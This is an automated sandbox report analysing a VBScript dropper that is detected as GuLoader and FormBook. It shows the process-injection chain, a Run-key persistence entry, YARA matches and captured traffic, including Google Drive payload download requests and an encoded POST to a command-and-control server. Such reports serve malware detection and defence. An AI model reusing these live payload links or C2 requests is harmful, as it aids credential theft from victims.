Windows Analysis Report
1000901 LIQUIDACION.vbs

Overview

General Information

Sample name: 1000901 LIQUIDACION.vbs
Analysis ID: 1430770
MD5: 14ac5b0600701be4d0ed3990a64efce4
SHA1: 45778f2240e082952eb68ec11885ccee168498de
SHA256: 598ef0ef2670ff8f0dfa5f9849e1723a8a4c20e470a23b6b67d72db9e9146007
Tags: vbs
Infos:

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7408 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1000901 LIQUIDACION.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7500 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line omitted] MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7660 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Medikamentel.Ddg && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7728 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line omitted] MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 7816 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Medikamentel.Ddg && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 6288 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 7192 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 6908 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • MSHXUddoGk.exe (PID: 1172 cmdline: "C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • replace.exe (PID: 2988 cmdline: "C:\Windows\SysWOW64\replace.exe" MD5: A7F2E9DD9DE1396B1250F413DA2F6C08)
              • MSHXUddoGk.exe (PID: 5248 cmdline: "C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
              • firefox.exe (PID: 2284 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • wab.exe (PID: 1832 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • rundll32.exe (PID: 2148 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • wab.exe (PID: 2688 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
No configs have been found
        Source | Rule | Description | Author | Strings
        00000012.00000002.2595491228.0000000002250000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
        00000012.00000002.2595491228.0000000002250000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
        • 0x571b8:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x40737:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        00000011.00000002.2595044684.00000000029A0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
        00000011.00000002.2595044684.00000000029A0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
        • 0x2a130:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x136af:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        00000011.00000002.2595118145.00000000029E0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
        Source | Rule | Description | Author | Strings
        amsi64_7500.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
        • 0x100b1:$b2: ::FromBase64String(
        • 0xd44d:$s1: -join
        • 0x6bf9:$s4: +=
        • 0x6cbb:$s4: +=
        • 0xaee2:$s4: +=
        • 0xcfff:$s4: +=
        • 0xd2e9:$s4: +=
        • 0xd42f:$s4: +=
        • 0xf67d:$s4: +=
        • 0xf6fd:$s4: +=
        • 0xf7c3:$s4: +=
        • 0xf843:$s4: +=
        • 0xfa19:$s4: +=
        • 0xfa9d:$s4: +=
        • 0xdb66:$e4: Get-WmiObject
        • 0xdd55:$e4: Get-Process
        • 0xddad:$e4: Start-Process
        amsi32_7728.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
        • 0x10014:$b2: ::FromBase64String(
        • 0xd44d:$s1: -join
        • 0x6bf9:$s4: +=
        • 0x6cbb:$s4: +=
        • 0xaee2:$s4: +=
        • 0xcfff:$s4: +=
        • 0xd2e9:$s4: +=
        • 0xd42f:$s4: +=
        • 0xf67d:$s4: +=
        • 0xf6fd:$s4: +=
        • 0xf7c3:$s4: +=
        • 0xf843:$s4: +=
        • 0xfa19:$s4: +=
        • 0xfa9d:$s4: +=
        • 0xdb66:$e4: Get-WmiObject
        • 0xdd55:$e4: Get-Process
        • 0xddad:$e4: Start-Process
        • 0x17af0:$e4: Get-Process

        System Summary

        Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1000901 LIQUIDACION.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1000901 LIQUIDACION.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1000901 LIQUIDACION.vbs", ProcessId: 7408, ProcessName: wscript.exe
        Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe" , CommandLine: "C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe, NewProcessName: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe, OriginalFileName: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 6908, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe" , ProcessId: 1172, ProcessName: MSHXUddoGk.exe
        Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Program Files (x86)\windows mail\wab.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\replace.exe, ProcessId: 2988, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YDN4C
        Source: Process started, Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1000901 LIQUIDACION.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1000901 LIQUIDACION.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1000901 LIQUIDACION.vbs", ProcessId: 7408, ProcessName: wscript.exe
        Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line omitted]
        No Snort rule has matched

        AV Detection

        Source: http://pesterbdd.com/images/Pester.png, URL Reputation: Label: malware
        Source: http://www.dhleba51.ru/im2z/, Avira URL Cloud: Label: malware
        Source: Yara match, File source: 00000012.00000002.2595491228.0000000002250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000011.00000002.2595044684.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000011.00000002.2595118145.00000000029E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000011.00000002.2593836346.00000000024F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 0000000C.00000002.2249433724.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: unknown, HTTPS traffic detected: 142.250.101.100:443 -> 192.168.2.9:49706 version: TLS 1.2
        Source: unknown, HTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.9:49707 version: TLS 1.2
        Source: unknown, HTTPS traffic detected: 142.250.101.100:443 -> 192.168.2.9:49712 version: TLS 1.2
        Source: unknown, HTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.9:49713 version: TLS 1.2
        Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000005.00000002.1921609089.0000000007489000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbZ source: powershell.exe, 00000005.00000002.1924285090.000000000826A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1921609089.0000000007390000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: replace.pdb source: wab.exe, 0000000C.00000003.2218166538.0000000008A61000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1924285090.000000000826A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.1913857979.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: tem.Core.pdb source: powershell.exe, 00000005.00000002.1924285090.000000000826A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: replace.pdbGCTL source: wab.exe, 0000000C.00000003.2218166538.0000000008A61000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: wab.exe, 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: wab.exe, wab.exe, 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1924285090.000000000826A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: stem.Core.pdbS] source: powershell.exe, 00000005.00000002.1924285090.000000000826A000.00000004.00000020.00020000.00000000.sdmp

        Software Vulnerabilities

        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: Joe Sandbox ViewIP Address: 195.24.68.5 195.24.68.5
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=13sIDgKu2D7iI6zRxA4gGYSas5i0mhATB HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /download?id=13sIDgKu2D7iI6zRxA4gGYSas5i0mhATB&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-KQmxodyjhhw6fN77qkVCo3Tox2hzzLI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /download?id=1-KQmxodyjhhw6fN77qkVCo3Tox2hzzLI&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /im2z/?_Ny4=z4HNqRUNVhKU+Qtv1eU7JRxQK/gynbhJk0uSl0XlGEkve/f45BAiGTLGfSdewEtjJuikjLVXYXf/hVlacLZbmvfCaC2wD3OuQ9Qp/Q6XbR8wDKz6gQ==&B6H=rZ8dY HTTP/1.1Host: www.webwheelsmedia.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
        Source: unknownDNS traffic detected: queries for: drive.google.com
        Source: unknownHTTP traffic detected: POST /im2z/ HTTP/1.1Host: www.dhleba51.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,enOrigin: http://www.dhleba51.ruConnection: closeContent-Length: 193Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheReferer: http://www.dhleba51.ru/im2z/User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0Data Raw: 5f 4e 79 34 3d 7a 78 76 31 75 73 58 67 67 48 79 48 36 59 46 47 70 41 66 38 63 70 32 37 57 75 57 78 4f 4d 74 54 4b 38 76 2b 6d 6a 6c 33 64 79 36 63 6c 38 69 67 68 48 77 38 45 2b 48 2b 4e 64 4f 34 69 45 6c 57 42 77 6f 76 69 72 74 58 4c 49 47 61 56 70 4e 59 53 4d 78 65 67 6e 53 72 4b 69 5a 59 55 75 54 58 72 6e 62 46 36 67 70 76 4a 47 4c 51 43 2f 32 65 7a 59 42 44 64 66 4c 64 2f 4a 58 34 38 6d 63 63 75 41 31 6b 66 65 4a 42 59 4b 79 54 6f 6e 4d 6c 43 41 6c 77 4c 58 48 77 4a 50 4f 4d 71 33 6c 79 52 75 2b 50 46 33 67 70 42 39 52 5a 54 38 52 74 4a 6f 77 4b 64 4b 6c 78 65 56 4f 65 Data Ascii: _Ny4=zxv1usXggHyH6YFGpAf8cp27WuWxOMtTK8v+mjl3dy6cl8ighHw8E+H+NdO4iElWBwovirtXLIGaVpNYSMxegnSrKiZYUuTXrnbF6gpvJGLQC/2ezYBDdfLd/JX48mccuA1kfeJBYKyTonMlCAlwLXHwJPOMq3lyRu+PF3gpB9RZT8RtJowKdKlxeVOe
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Wed, 24 Apr 2024 05:05:04 GMTContent-Type: text/html; charset=utf-8Content-Length: 48773Connection: closeAccept-Ranges: bytes
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Wed, 24 Apr 2024 05:05:07 GMTContent-Type: text/html; charset=utf-8Content-Length: 48773Connection: closeAccept-Ranges: bytes
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Wed, 24 Apr 2024 05:05:10 GMTContent-Type: text/html; charset=utf-8Content-Length: 48773Connection: closeAccept-Ranges: bytes
        Source: powershell.exe, 00000002.00000002.2177170811.000002B339BF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
        Source: powershell.exe, 00000002.00000002.2177170811.000002B339C2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
        Source: powershell.exe, 00000002.00000002.2333966169.000002B347A73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1919062447.0000000005BA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000005.00000002.1915385370.0000000004C98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000002.00000002.2177170811.000002B337A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1915385370.0000000004B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: MSHXUddoGk.exe, 00000012.00000002.2596058187.0000000002C04000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://webwheelsmedia.com/im2z/?_Ny4=z4HNqRUNVhKU
        Source: powershell.exe, 00000005.00000002.1915385370.0000000004C98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000002.00000002.2177170811.000002B337A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000005.00000002.1915385370.0000000004B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
        Source: powershell.exe, 00000002.00000002.2177170811.000002B339C19000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1893294150.0000000008A26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
        Source: powershell.exe, 00000005.00000002.1919062447.0000000005BA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000005.00000002.1919062447.0000000005BA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000005.00000002.1919062447.0000000005BA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000002.00000002.2177170811.000002B339BEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
        Source: powershell.exe, 00000002.00000002.2177170811.000002B337E10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339B94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
        Source: wab.exe, 0000000C.00000002.2285301301.0000000023B70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1-KQmxodyjhhw6fN77qkVCo3Tox2hzzLI
        Source: powershell.exe, 00000002.00000002.2353946109.000002B34FF04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=13sIDgKu2D7iI6zRxA4gGYSas5i0mhATB32
        Source: powershell.exe, 00000002.00000002.2177170811.000002B337C27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=13sIDgKu2D7iI6zRxA4gGYSas5i0mhATBP
        Source: powershell.exe, 00000005.00000002.1915385370.0000000004C98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=13sIDgKu2D7iI6zRxA4gGYSas5i0mhATBXR
        Source: powershell.exe, 00000002.00000002.2177170811.000002B339C19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
        Source: powershell.exe, 00000002.00000002.2177170811.000002B337F3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339C19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
        Source: wab.exe, 0000000C.00000003.2155565700.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.2273092683.0000000008A26000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1897031351.0000000008A26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
        Source: wab.exe, 0000000C.00000003.2155565700.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.2273092683.0000000008A26000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1897031351.0000000008A26000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1893294150.0000000008A26000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.2155735479.0000000008A0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1-KQmxodyjhhw6fN77qkVCo3Tox2hzzLI&export=download
        Source: wab.exe, 0000000C.00000003.2155565700.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.2273092683.0000000008A26000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1897031351.0000000008A26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1-KQmxodyjhhw6fN77qkVCo3Tox2hzzLI&export=downloadf
        Source: wab.exe, 0000000C.00000003.2155565700.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.2273092683.0000000008A26000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1897031351.0000000008A26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1-KQmxodyjhhw6fN77qkVCo3Tox2hzzLI&export=downloadh
        Source: powershell.exe, 00000002.00000002.2177170811.000002B337F3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339C19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=13sIDgKu2D7iI6zRxA4gGYSas5i0mhATB&export=download
        Source: powershell.exe, 00000005.00000002.1915385370.0000000004C98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000002.00000002.2177170811.000002B33858E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 00000002.00000002.2333966169.000002B347A73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1919062447.0000000005BA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 00000002.00000002.2177170811.000002B339C19000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1893294150.0000000008A26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
        Source: powershell.exe, 00000002.00000002.2177170811.000002B339BF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B337F39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339C15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339C19000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1893294150.0000000008A26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
        Source: powershell.exe, 00000002.00000002.2177170811.000002B337F39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339C15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339C19000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1893294150.0000000008A26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: powershell.exe, 00000002.00000002.2177170811.000002B339BF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B337F39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339C15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339C19000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1893294150.0000000008A26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
        Source: powershell.exe, 00000002.00000002.2177170811.000002B339BF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B337F39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339C15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339C19000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1893294150.0000000008A26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
        Source: unknownHTTPS traffic detected: 142.250.101.100:443 -> 192.168.2.9:49706 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.9:49707 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.250.101.100:443 -> 192.168.2.9:49712 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.9:49713 version: TLS 1.2

        E-Banking Fraud

        Source: Yara matchFile source: 00000012.00000002.2595491228.0000000002250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2595044684.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
